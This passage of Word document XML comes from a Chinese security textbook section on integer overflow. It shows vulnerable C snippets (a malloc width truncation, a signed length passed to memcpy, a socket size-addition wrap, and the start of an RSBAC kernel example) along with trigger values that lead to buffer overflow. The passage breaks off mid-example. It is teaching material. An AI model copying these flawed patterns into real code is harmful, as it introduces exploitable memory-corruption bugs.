          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">myarray[i] = arrary[i]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E26874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2721CB80"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观察以上代码，函数根据参数len申请了len长度的int数组，并对数组指针进行了判断，若m</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>yarray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针不为NULL，则进行数组复制操作。但malloc函数的参数为s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ize_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型，在3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位系统下与u</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>nsigned int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的取值范围相同，则若len</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>*sizeof(int)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的范围超过了s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ize_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将发生截断。例如，若len</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>=0x7fffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是int类型能表示的最大值，则malloc的参数len</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>*sizeof(int)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0x7fffffff*4=0x1fffffffc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，超出4字节表示范围，发生截断，实际上申请了0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>xfffffffc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的数据。0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>fffffffc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节换算成int类型数组的长度为0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>x3fffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小于len，则在for循环进行数组复制时，会发生越界溢出，若参数array指向的地址含有Shellcode，则会导致恶意代码的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688B342" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5551C8F0"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>整数符号溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D96707C"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6621F5"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static char data[256]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3196D6"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int store_data(char *buf, int len) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3574599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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F0659"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if(len &gt; 256) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC35927" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">return -1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FF853"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return memcpy(data, buf, len); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2642C0"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32DB74E0"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观察以上代码，在执行memcpy之前进行了len的大小判断，若len大于data数组长度则不进行m</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>emcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存复制，但memcpy的第3个参数为u</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>nsigned int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，若len是一个负数，则换算为unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int可能是一个极大的整数。例如len</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>=-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则对应的十六进制为0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>xffffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，转换为unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>4294967295</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而len=-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，不满足len&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的判断条件，不会进入if体，而执行memcpy。由于data数组只有2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节，将导致缓冲区溢出，若buf指向的地址存在Shellcode，则会导致恶意代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F86E6"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.4.4 整数溢出真实案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86F10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接下来分析3个整数溢出的真实案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8B032" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EC392A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>典型socket代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59F9A4"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CAEC4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int get_two_vars(int sock, char *out, int len)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8637A"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406CEB74"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char buf1[512], buf2[512];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D919A75"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unsigned int size1, size2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF41C3"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int size; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAA5B7"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if(recv(sock, buf1, sizeof(buf1), 0) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E42915"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008EF09" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6EF09"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCD9AE"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if(recv(sock, buf2, sizeof(buf2), 0) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C79E89"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19BBB3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4271E8"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318ADBF"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memcpy(&amp;size1, buf1, sizeof(int));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE3169"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memcpy(&amp;size2, buf2, sizeof(int)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A4562"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size = size1 + size2; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54C24E"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if(size &gt; len)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEEDFE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED2A4E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C9DB9"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB7C34"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memcpy(out, buf1, size1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798A0FF"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memcpy(out + size1, buf2, size2); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45652E44" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">return size; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACBDC5"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5EF90AF4"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这个例子的代码来源于一些网络后台程序的socket通信代码中，其中length信息可能是从网络数据包的一部分传递而来。对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>size = size1 + size2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处的加法,用于检查数据没有超出了out缓冲区的范围，在设置size1和size2相加时可能会产生一个很大的值，这个值会引起size变量变成一个负数。例如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13260B0F"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size1 = 0x7fffffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582FED0"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size2 = 0x7fffffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D764C86"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rPr>
        <w:t>(0x7fffffff + 0x7fffffff = 0xfffffffe (-2)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E629E26"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当上面操作执行时，绕过了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>if(size &gt; len)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的越界检测，可导致大量out缓冲区的数据被Shellcode覆盖。这个漏洞只要精确的构造数据可以被利用，和整数符号类型问题的漏洞类似，产生的负数值将会解释成一个非常大的正整数，那么在执行memcpy的时候就会很容易的导致段错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A002D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC5BF86" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一段Linux内核代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40515737"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8BA32A"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int rsbac_acl_sys_group(enum rsbac_acl_group_syscall_type_t call,union </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF2EFE"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rsbac_acl_group_syscall_arg_t arg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA8A9D"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D644F53"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43F606"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switch(call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664219F8"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB3E7A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="402" w:firstLine="844"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>case ACLGS_get_group_members:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC879B5" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="405" w:firstLine="850"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>if((arg.get_group_members.maxnum&lt;=0)||!arg.get_group_members.group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1CEC0" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="405" w:firstLine="850"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">{ ... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9565DC" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">rsbac_uid_t * user_array;rsbac_time_t * ttl_array; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D714EAF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>user_array=vmalloc(sizeof(*user_array)*arg.get_group_members.maxnum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE47E64" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">if(!user_array) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1B50C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="807" w:firstLine="1695"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
